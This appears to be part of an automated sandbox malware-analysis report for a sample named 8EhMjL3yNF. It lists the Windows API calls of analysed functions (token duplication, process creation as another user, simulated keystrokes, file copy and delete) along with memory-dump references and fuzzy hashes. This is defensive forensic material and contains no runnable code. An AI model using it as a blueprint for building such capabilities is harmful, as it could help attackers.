                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2962429428-0
                                                                                                                                                                  • Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                                                                                                                                  • Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
                                                                                                                                                                  • Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                                                                                                                                  • Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50
                                                                                                                                                                  Function 044022E8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • Sleep.KERNELBASE(000001F4), ref: 044022F9
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703524933852.0000000004400000.00000040.00000020.00020000.00000000.sdmp, Offset: 04400000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_4400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                                                  • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                                                  • Instruction ID: fe1a642603a5391c112bfc18bf8462489172b89a3a622b35b2576ad7a5fc3dbd
                                                                                                                                                                  • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                                                  • Instruction Fuzzy Hash: 2EE0E67494010DDFDB00DFB4D64D69D7BB4FF04301F1045A1FD01E2280DA709D608A72

                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                  Function 0047C81C Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 674windowkeyboardCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                                                                                                                                  • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                                                                                                                                  • GetKeyState.USER32(00000011), ref: 0047C92D
                                                                                                                                                                  • GetKeyState.USER32(00000009), ref: 0047C936
                                                                                                                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                                                                                                                                  • GetKeyState.USER32(00000010), ref: 0047C953
                                                                                                                                                                  • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                                                                                                                                  • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                                                                                                                                  • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                                                                                                                                  • SendMessageW.USER32 ref: 0047CA7F
                                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                                                                                                                                  • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                                                                                                                                  • ImageList_SetDragCursorImage.COMCTL32(009A0FF0,00000000,00000000,00000000), ref: 0047CB9B
                                                                                                                                                                  • ImageList_BeginDrag.COMCTL32(009A0FF0,00000000,000000F8,000000F0), ref: 0047CBAC
                                                                                                                                                                  • SetCapture.USER32(?), ref: 0047CBB6
                                                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                                                                                                                                  • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                                                                                                                                  • ReleaseCapture.USER32 ref: 0047CC3A
                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 0047CC72
                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                                                                                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                                                                                                                                  • SendMessageW.USER32 ref: 0047CD12
                                                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                                                                                                                                  • SendMessageW.USER32 ref: 0047CD80
                                                                                                                                                                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                                                                                                                                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 0047CDC8
                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                                                                                                                                  • GetParent.USER32(00000000), ref: 0047CDF7
                                                                                                                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                                                                                                                                  • SendMessageW.USER32 ref: 0047CE93
                                                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                                                                                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,03311C00,00000000,?,?,?,?), ref: 0047CF1C
                                                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                                                                                                                                  • SendMessageW.USER32 ref: 0047CF6B
                                                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                                                                                                                                  • TrackPopupMenuEx.USER32(?,00000080,?,?,03311C00,00000000,?,?,?,?), ref: 0047CFE6
                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease
                                                                                                                                                                  • String ID: @GUI_DRAGID$F
                                                                                                                                                                  • API String ID: 115643240-4164748364
                                                                                                                                                                  • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                                                                                                                  • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                                                                                                                                  • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                                                                                                                  • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                                                                                                                                  Function 00434418 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 133keyboardthreadwindowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 00434420
                                                                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                                                                                                                                  • IsIconic.USER32(?), ref: 0043444F
                                                                                                                                                                  • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                                                                                                                                  • SetForegroundWindow.USER32(?), ref: 0043446A
                                                                                                                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                                                                                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                                                                                                                                  • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                                                                                                                                  • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                                                                                                                                  • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                                                                                                                                  • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                                                                  • API String ID: 2889586943-2988720461
                                                                                                                                                                  • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                                                                                                                  • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                                                                                                                                  • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                                                                                                                  • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                                                                                                                                  Function 00446313 Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 234processCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004463A0
                                                                                                                                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                                                                                                                                  • GetProcessWindowStation.USER32 ref: 004463D1
                                                                                                                                                                  • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                                                                                                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                                                                                                                                  • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                                                                                                                                  • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                                                                                                                                  • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                                                                                                                                  • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                                                                                                                                  • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                                                                                                                                  • CloseDesktop.USER32(?), ref: 0044657A
                                                                                                                                                                  • SetProcessWindowStation.USER32(?), ref: 00446588
                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00446592
                                                                                                                                                                  • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload
                                                                                                                                                                  • String ID: $@OH$default$winsta0
                                                                                                                                                                  • API String ID: 4266742174-3791954436
                                                                                                                                                                  • Opcode ID: c59e5e30eb208dfc2a579b6e23ab0a432a815ea73a819448e306c539da558518
                                                                                                                                                                  • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                                                                                                                                  • Opcode Fuzzy Hash: c59e5e30eb208dfc2a579b6e23ab0a432a815ea73a819448e306c539da558518
                                                                                                                                                                  • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                                                                                                                                  Function 00431A86 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                                                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00431B20
                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00431B34
                                                                                                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                  • String ID: *.*
                                                                                                                                                                  • API String ID: 1409584000-438819550
                                                                                                                                                                  • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                                                                                                                  • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                                                                                                                                  • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                                                                                                                  • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                                                                                                                                  Function 0044BD27 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 178filestringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                                                                                                    • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                                                                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 0044BED3
                                                                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                                                                                                                                                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                                                                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 0044BF15
                                                                                                                                                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0044BF33
                                                                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0044BF7C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$Find$CloseCopyDeleteMove$AttributesFirstFullNameNextPathlstrcmpi
                                                                                                                                                                  • String ID: \*.*
                                                                                                                                                                  • API String ID: 2518010859-1173974218
                                                                                                                                                                  • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                                                                                                                                  • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                                                                                                                                                                  • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                                                                                                                                  • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                                                                                                                                                                  Function 004720DB Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 377timeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                                                                                                                                  • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                                                                                                                                  • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                                                                                                                                  • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                                                                                                                                  • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                                                                                                                                  • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                                                                                                                                  • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                                                                                                                                  • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                                                                                                                                  • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                                                                                                                                  • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FolderPath$LocalTime
                                                                                                                                                                  • String ID: %.3d
                                                                                                                                                                  • API String ID: 87575609-986655627
                                                                                                                                                                  • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                                                                                                                  • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                                                                                                                                  • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                                                                                                                  • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                                                                                                                                  Function 00442886 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 135fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0044291C
                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00442930
                                                                                                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 004429D4
                                                                                                                                                                    • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 004429E2
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                  • String ID: *.*
                                                                                                                                                                  • API String ID: 2640511053-438819550
                                                                                                                                                                  • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                                                                                                                  • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                                                                                                                                  • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                                                                                                                  • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                                                                                                                                  Function 00431BE8 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 116COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
